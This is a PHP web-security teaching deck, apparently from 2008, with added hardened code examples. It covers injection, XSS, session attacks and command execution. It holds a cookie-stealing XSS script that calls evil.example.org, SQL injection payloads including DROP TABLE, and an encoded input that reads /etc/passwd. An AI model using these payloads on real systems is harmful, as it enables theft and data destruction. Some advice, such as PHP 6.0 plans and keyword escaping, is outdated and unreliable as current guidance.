5.
Fact 1: PHP is mainly for web programs
Fact 2: Easy to learn
6.
Fact 3: PHP runs on 20,917,850 domains and 1,224,183 IP addresses
Fact 4: More flexible functions
7. A few named threats
Code Injection
SQL Injection
Cross-Site Scripting (XSS)
Session Hijacking
Session Fixation
Temp file abuse
Remote Execution
...and more and more unnamed threats
9. Code Injection
Don't pass filenames straight through from the request:
$filename = $_REQUEST['message'];
$message = file_get_contents($filename);
print $message;
This is fine:
http://example.com/myscript.php?message=hello.txt
But what if I request this?
http://example.com/myscript.php?message=passwords.txt
10. Code Injection
This is especially important for include, require and require_once:
$module = $_REQUEST['module'];
include("lib/$module");
This is fine:
http://example.com/cms?module=login.php
But what if I request this?
http://example.com/cms?module=../passwords.ini
11. Code Injection Defense
Make sure the value is one you expected; if not... ERROR!
$requestedModule = $_REQUEST['module'];
switch ($requestedModule) {
    case "login":
        $module = "login";
        break;
    case "logout":
        $module = "logout";
        break;
    default:
        $module = "error";
}
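The following is an added example, not code from the original slides. It hardens both patterns shown on slides 9 to 11: the user-named message file is confined to one directory with realpath(), and the user-named module is mapped through a fixed allow-list (the switch above, generalised to an array). The directory names and the allowed module list are assumptions made for this example.

```php
<?php
// Added example (not from the original slides): hardened versions of the two
// patterns above, the user-named message file and the user-named module.
// MESSAGE_DIR, lib/ and ALLOWED_MODULES are assumptions for this example.

const MESSAGE_DIR = __DIR__ . '/messages';
const ALLOWED_MODULES = ['login', 'logout'];

// Return the text of a message file, or null when the name is not a plain
// "name.txt" that resolves to a file inside MESSAGE_DIR.
function readMessage(string $name): ?string
{
    // No slashes, no "..", no NUL bytes: only letters, digits, "_" and "-".
    if (!preg_match('/^[A-Za-z0-9_-]+\.txt$/', $name)) {
        return null;
    }
    $base = realpath(MESSAGE_DIR);
    $path = realpath(MESSAGE_DIR . '/' . $name);
    // realpath() follows symlinks, so check the final location as well.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    $text = file_get_contents($path);
    return $text === false ? null : $text;
}

// Map the requested name onto our own fixed list (the switch on the slide,
// generalised to an allow-list); anything else becomes the "error" module.
function resolveModule(string $requested): string
{
    return in_array($requested, ALLOWED_MODULES, true) ? $requested : 'error';
}

function loadModule(string $requested): void
{
    // The path is built only from names we defined ourselves, so no path
    // characters from the request can ever reach require().
    require __DIR__ . '/lib/' . resolveModule($requested) . '.php';
}

// Usage:
// print readMessage((string) ($_REQUEST['message'] ?? '')) ?? 'No such message';
// loadModule((string) ($_REQUEST['module'] ?? ''));
```

The strict third argument of in_array() matters: without it, values such as "0" compare loosely equal to some strings and could slip through the allow-list.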
13. SQL Injection
A form for user search...
$username = $_POST['username'];
$query = "SELECT * FROM users WHERE name = '" . $username . "';";
If I give $username the value
a' or 't'='t
the query will be
"SELECT * FROM users WHERE name = 'a' or 't'='t';"
14. SQL Injection
If I give $username the value
a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%
the query will be
SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';
15. SQL Injection Defense
Use single quotation marks around values, eg:
"select * from users where user = '" . $username . "'"
Check the types of user-submitted values:
is_bool(), is_float(), is_numeric(), is_string(), is_int(), intval(), settype(), strlen()
eg: strpos($query, ';')
Escape every questionable character in your query:
' " , ; ( ) and the keywords "FROM", "LIKE" and "WHERE"
mysql_real_escape_string()
16. SQL Injection Defense
magic_quotes_gpc (default: on; deprecated in PHP 6.0)
If it is off, use addslashes()
If it is on and you don't need it, use stripslashes():
if (get_magic_quotes_gpc()) {
    $_GET = array_map('stripslashes', $_GET);
    $_POST = array_map('stripslashes', $_POST);
    $_COOKIE = array_map('stripslashes', $_COOKIE);
}
17. SQL Injection Defense
MySQL Improved Extension (mysqli), using a prepared statement:
// $link is an open mysqli connection (mysqli_prepare() takes the link, not a connection string)
$stmt = mysqli_prepare($link, "select * from user where user = ?");
mysqli_stmt_bind_param($stmt, "s", $username);
mysqli_stmt_execute($stmt);
Type letters for mysqli_stmt_bind_param():
s – string
i – integer
d – double
b – blob (binary data)
Also: PEAR DB, DataObject
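As an added example (not code from the original slides), here is the vulnerable search query from slides 13 and 14 beside its parameterised form, written with the object-oriented mysqli API. The connection values are placeholders; the users table and its name column are the ones used on the slides.

```php
<?php
// Added example, not from the original slides: the vulnerable search query
// next to its parameterised form using mysqli. The connection values are
// placeholders; the users table and its "name" column come from the slides.

$db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'DB_NAME');
$db->set_charset('utf8mb4');

// VULNERABLE: the input a' or 't'='t becomes part of the SQL text itself.
function findUserUnsafe(mysqli $db, string $username): ?array
{
    $sql = "SELECT * FROM users WHERE name = '" . $username . "'";
    $result = $db->query($sql);
    if (!($result instanceof mysqli_result)) {
        return null;
    }
    $row = $result->fetch_assoc();
    return $row ?: null;
}

// SAFE: the value is bound to a placeholder, so quotes and semicolons inside
// it are data for the server, never SQL. There is no escaping code to get wrong.
function findUser(mysqli $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE name = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $username);   // "s": bind as a string
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage:
// $user = findUser($db, (string) ($_POST['username'] ?? ''));
```

Feeding the payloads from slides 13 and 14 into findUser() simply searches for a user whose name is literally that string; the DROP TABLE never executes because the bound value is never parsed as SQL.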
19. XSS
1) Attacker inserts a script into the page:
<script>
document.location =
  'http://evil.example.org/steal_cookies.php?cookies=' +
  document.cookie
</script>
2) Login
3) Set cookies
4) The browser executes the script
5) The script steals the cookies
20. XSS
Remote control of the client browser:
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or any other undesirable action...
21. XSS Defense
Encode HTML entities in all non-HTML output: htmlentities()
Eg:
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
Output will be:
A 'quote' is &lt;b&gt;bold&lt;/b&gt;
Check the image upload URI (avatar, icon) with parse_url(). An "image" can otherwise point anywhere, eg:
<img src="http://shopping.example.com/addCart.php?item=123"/>
Show the domain name for user-submitted links, eg:
Not safe:
Hey click this to see my photo <a href="http://badguys.net">Bala</a>
Safe:
Hey click this to see my photo [badguys.net] Bala
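The following is an added example, not code from the original slides. It combines the two defences on this slide: an output-encoding helper built on htmlentities(), and a link renderer that uses parse_url() to show the real host next to any user-submitted link and refuses to link schemes other than http and https. The function names and the rel="nofollow" attribute are choices made for this example.

```php
<?php
// Added example, not from the original slides. It shows output encoding with
// htmlentities() and the "show the domain name" idea using parse_url().
// h() and renderUserLink() are names chosen for this example.

function h(string $text): string
{
    // ENT_QUOTES also encodes single quotes, so the value is safe inside
    // attributes delimited with either quote style.
    return htmlentities($text, ENT_QUOTES, 'UTF-8');
}

// Render a user-supplied link as "[host] text"; only http/https hosts are linked.
function renderUserLink(string $url, string $label): string
{
    $parts = parse_url($url);
    $scheme = strtolower($parts['scheme'] ?? '');
    $host = $parts['host'] ?? '';
    if ($parts === false || !in_array($scheme, ['http', 'https'], true) || $host === '') {
        // javascript:, data: and malformed URLs are shown as plain text only.
        return h($label);
    }
    return '[' . h($host) . '] <a href="' . h($url) . '" rel="nofollow">' . h($label) . '</a>';
}

// Usage with constructed inputs:
// echo renderUserLink('http://badguys.net/photo', 'Bala');
// echo renderUserLink('javascript:alert(1)', '<b>Bala</b>');
```

Unlike the slide's "safe" rendering, this keeps the link clickable but makes the destination host visible in the text, so a label such as "my photo" cannot hide where the link really goes.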
24. Session Hijacking
[Diagram: Victim, Attacker, Web Server; the victim's session ID is AD238723FD32]
25. Session Hijacking
[Diagram: Victim, Attacker, Web Server; the same session ID, AD238723FD32, now appears on both the victim's and the attacker's connection to the web server]
26. Session Hijacking
Network eavesdropping (promiscuous mode)
If intranet? Use a switch rather than a hub
If WiFi? WEP (Wired Equivalent Privacy)
If Internet? SSL
27. Session Hijacking
Unwitting exposure: sending links
"See this item: http://store.com/items.php?item=0987"
That is OK. But what if I send it like this?
http://store.com/items.php?item=0987&phpsessid=34223
How to avoid it?
session.use_trans_sid (turned off by default)
session.use_only_cookies (defaults to 1 (enabled) since PHP 6.0)
28. Session Fixation
[Diagram: Victim, Attacker, Web Server]
1) Attacker: "See this link: http://unsafesite?SID=3423"
2) If the victim clicks http://unsafesite?SID=3423,
3) the server shows the login page and sets Session ID = 3423 via session_id($_GET['SID'])
4) Attacker now has full access with http://unsafesite?SID=3423
29. Session Hijacking Defense
Use SSL.
Use cookies instead of $_GET variables:
ini_set('session.use_only_cookies', TRUE);
ini_set('session.use_trans_sid', FALSE);
Use session timeouts:
ini_set('session.cookie_lifetime', 1200);
ini_set('session.gc_maxlifetime', 1200);   // kept in step with cookie_lifetime above
Regenerate IDs for users with changed status:
session_regenerate_id()
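As an added example (not code from the original slides), here are the settings from slides 27 to 29 applied together, plus the server-side idle check and the ID regeneration on login that close the fixation scenario from slide 28. The 1200-second timeout matches the slide; session.use_strict_mode and the cookie_httponly / cookie_secure flags are additions to the slide's list, and the function names are choices made for this example.

```php
<?php
// Added example, not from the original slides: the session settings from
// slides 27-29 applied together with the checks that rely on them.
// SESSION_IDLE_SECONDS and the function names are assumptions for this example.

const SESSION_IDLE_SECONDS = 1200;

function startHardenedSession(): void
{
    ini_set('session.use_only_cookies', '1');   // ignore ?PHPSESSID=... in URLs
    ini_set('session.use_trans_sid', '0');      // never append the ID to links
    ini_set('session.use_strict_mode', '1');    // reject IDs the server did not issue
    ini_set('session.cookie_httponly', '1');    // not readable via document.cookie
    if (!empty($_SERVER['HTTPS'])) {
        ini_set('session.cookie_secure', '1');  // only sent over SSL
    }
    ini_set('session.cookie_lifetime', (string) SESSION_IDLE_SECONDS);
    ini_set('session.gc_maxlifetime', (string) SESSION_IDLE_SECONDS);
    session_start();

    // Idle timeout enforced server-side, not only through the cookie lifetime.
    if (isset($_SESSION['last_seen'])
        && time() - $_SESSION['last_seen'] > SESSION_IDLE_SECONDS) {
        session_unset();                 // drop everything the old session held
        session_regenerate_id(true);     // ...and give the visitor a fresh ID
    }
    $_SESSION['last_seen'] = time();
}

// Call after a successful login: a new ID invalidates any value an attacker
// planted earlier (session fixation), and the old session record is deleted.
function onLogin(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
}

function onLogout(): void
{
    $_SESSION = [];
    setcookie(session_name(), '', time() - 3600, '/');
    session_destroy();
}

// Usage:
// startHardenedSession();
// if ($credentialsAreValid) { onLogin($userId); }
```

With use_only_cookies and use_strict_mode set, the link from slide 28 no longer fixes the ID: the SID in the query string is ignored, and an unknown cookie value is replaced with a server-generated one.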
31. Remote Execution
Injection of shell commands:
<?php
$filename = $_GET['filename'];
$command = "/usr/bin/wc $filename";
$words = shell_exec($command);
print "$filename contains $words words.";
?>
This is fine:
wordcount.php?filename=textfile.txt
But what if I give this?
wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(filename decodes to: /dev/null | cat /etc/passwd)
The shell then runs: /usr/bin/wc /dev/null | cat /etc/passwd
32. Remote Execution Defense
Allow only trusted, human users to import code
Store uploads outside of the web document root
Limit allowable filename extensions for upload
Use the disable_functions directive, eg:
disable_functions = "eval,phpinfo"
(eval is a language construct rather than a function, so disable_functions cannot switch it off; shell_exec, system, exec and passthru are the kind of functions it does block)
Do not include PHP scripts from remote servers, eg:
<?php
include('http://example.net/code/common.php');
?>
Properly escape all shell commands:
escapeshellarg(), escapeshellcmd()
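The following is an added example, not code from the original slides. It rewrites the wordcount script from slide 31 so that the filename can never become part of the shell command: the name is restricted to a plain file in one directory, and the argument is passed through escapeshellarg() as the last line of defence. The upload directory and the function name are assumptions made for this example.

```php
<?php
// Added example, not from the original slides: the wordcount script from
// slide 31, rewritten so the filename cannot become part of the command.
// UPLOAD_DIR and countWords() are assumptions for this example.

const UPLOAD_DIR = '/var/www/uploads';

function countWords(string $filename): ?int
{
    // 1. Only simple names, no path separators and no leading dot, so
    //    "/dev/null | cat /etc/passwd" is rejected before any command exists.
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $filename) || $filename[0] === '.') {
        return null;
    }
    $path = UPLOAD_DIR . '/' . $filename;
    if (!is_file($path)) {
        return null;
    }
    // 2. escapeshellarg() wraps the argument in single quotes and escapes any
    //    quote inside it, so even if the check above were relaxed the shell
    //    would see one literal argument, never a pipeline.
    $output = shell_exec('/usr/bin/wc -w ' . escapeshellarg($path));
    if ($output === null) {
        return null;
    }
    // wc -w prints "<count> <path>"; the leading number is all we need.
    return (int) ltrim($output);
}

// Usage (output is HTML-encoded, see the XSS slides):
// $name = (string) ($_GET['filename'] ?? '');
// $words = countWords($name);
// print $words === null
//     ? 'No such file.'
//     : htmlentities($name, ENT_QUOTES, 'UTF-8') . " contains $words words.";
```

escapeshellarg() protects a single argument; escapeshellcmd() is for a whole command line and does not stop an attacker from adding extra arguments, so prefer escapeshellarg() per argument whenever the command structure is fixed.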
33. Future? PHP 6.0
Deprecation:
Register Globals (big security hole)
Safe Mode (false sense of security)
Magic Quotes (messed with the data)
Upcoming changes and features:
http://www.php.net/~derick/meetingnotes.html
http://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf – PHP 6.0 Wish List: http://news.php.net/php.internals/17883
34. What to do?
Proper input validation
Don't do programming + security; do secure programming
htmlentities, mysql_real_escape_string, parse_url, addslashes, escapeshellarg, escapeshellcmd... etc.
SSL
Use PEAR, PECL
36. References
Pro PHP Security, Chris Snyder and Michael Southwell
http://wikipedia.org/
http://www.sitepoint.com/article/phpsecurityblunders
http://phpsec.org/
http://www.google.com/
39. Copyright (c) 2008
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation.
http://www.gnu.org/copyleft/fdl.html